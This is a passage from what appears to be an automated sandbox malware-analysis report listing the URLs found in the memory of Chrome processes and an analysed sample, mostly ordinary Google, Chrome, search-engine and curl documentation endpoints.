0000000A.00000003.1696874529.000077D403124000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716038275.000077D4024FF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696076889.000077D4031C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chrome.exe, 0000000A.00000002.1719043134.000077D402B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: chrome.exe, 0000000A.00000002.1719229790.000077D402BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://unisolated.invalid/
Source: Amcache.hve.20.dr	String found in binary or memory: http://upx.sf.net
Source: chrome.exe, 0000000A.00000002.1719364584.000077D402C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204
Source: chrome.exe, 0000000A.00000002.1720281101.000077D402E28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 0000000A.00000002.1714682334.000077D4022D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 0000000A.00000002.1716386602.000077D40260C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716578996.000077D4026A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 0000000A.00000002.1714355833.000077D402220000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 0000000A.00000002.1716708558.000077D4026D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo?source=ChromiumBrowser
Source: chrome.exe, 0000000A.00000002.1717303494.000077D40286C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697169447.000077D402E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1719488740.000077D402C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1720388829.000077D402E60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1693620428.000077D402E60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
Source: chrome.exe, 0000000A.00000002.1719488740.000077D402C5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardn
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 0000000A.00000002.1716708558.000077D4026D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout?source=ChromiumBrowser&continue=https://accounts.google.com/chrom
Source: chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 0000000A.00000002.1719403421.000077D402C28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/OAuthLogin?source=ChromiumBrowser&issueuberauth=1
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 0000000A.00000002.1714434222.000077D40224C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 0000000A.00000002.1714434222.000077D40224C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 0000000A.00000002.1714434222.000077D40224C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 0000000A.00000002.1714682334.000077D4022D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com:443
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716578996.000077D4026A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716578996.000077D4026A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/73697
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 0000000A.00000002.1717882214.000077D40297C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716783630.000077D402708000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1722075396.000077D403034000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 0000000A.00000002.1720281101.000077D402E28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: chrome.exe, 0000000A.00000002.1720478282.000077D402E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 0000000A.00000002.1719488740.000077D402C5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 0000000A.00000002.1719488740.000077D402C5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: chrome.exe, 0000000A.00000002.1714682334.000077D4022D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 0000000A.00000003.1692504233.000077D402F80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 0000000A.00000002.1717412670.000077D4028AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 0000000A.00000002.1720588710.000077D402EA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1717511799.000077D4028E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1719364584.000077D402C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 0000000A.00000002.1717511799.000077D4028E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enM
Source: chrome.exe, 0000000A.00000003.1695665623.000077D402F80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1721334758.000077D402F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716578996.000077D4026AF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1693515231.000077D402F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696549350.000077D402F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1694423586.000077D402F80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1718684184.000077D402AB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1693593094.000077D4026AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716134271.000077D402520000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692469687.000077D402F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692399699.000077D402F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697492707.000077D402540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692504233.000077D402F80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 0000000A.00000002.1717412670.000077D4028AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreNXDTqqTE=
Source: chrome.exe, 0000000A.00000003.1685080258.000031A0006B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 0000000A.00000003.1684704880.000031A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1712332797.000031A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1684483515.000031A000390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 0000000A.00000003.1685080258.000031A0006B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 0000000A.00000003.1684704880.000031A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1712332797.000031A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1684483515.000031A000390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 0000000A.00000002.1712153972.000031A00078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 0000000A.00000003.1684991603.000031A000684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1712153972.000031A00078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 0000000A.00000003.1684704880.000031A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1712332797.000031A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1684483515.000031A000390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 0000000A.00000002.1714355833.000077D402220000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 0000000A.00000002.1720780216.000077D402F14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/_
Source: chrome.exe, 0000000A.00000003.1680775125.00003DC8002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1680683586.00003DC8002D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 0000000A.00000002.1717092866.000077D4027EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/c
Source: chrome.exe, 0000000A.00000002.1718355012.000077D402A70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1718234918.000077D402A5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1717268170.000077D402858000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1714434222.000077D402260000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1717445113.000077D4028BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1717652490.000077D402924000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 0000000A.00000002.1719855812.000077D402CF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
Source: chrome.exe, 0000000A.00000002.1719043134.000077D402B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 0000000A.00000002.1719043134.000077D402B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 0000000A.00000002.1717882214.000077D40297C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 0000000A.00000002.1716640277.000077D4026B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1717223028.000077D402830000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716540378.000077D402684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 0000000A.00000002.1717955813.000077D4029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1718020308.000077D4029D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1720780216.000077D402F14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716708558.000077D4026D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000000A.00000002.1717955813.000077D4029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1718020308.000077D4029D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1720780216.000077D402F14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716708558.000077D4026D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000000A.00000002.1717955813.000077D4029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1718020308.000077D4029D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1720780216.000077D402F14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716708558.000077D4026D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716540378.000077D402684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 0000000A.00000002.1717882214.000077D40297C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716783630.000077D402708000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1722075396.000077D403034000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000000A.00000002.1722075396.000077D403034000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actionsSB
Source: chrome.exe, 0000000A.00000002.1716783630.000077D402708000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actionsw
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1715957583.000077D4024D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
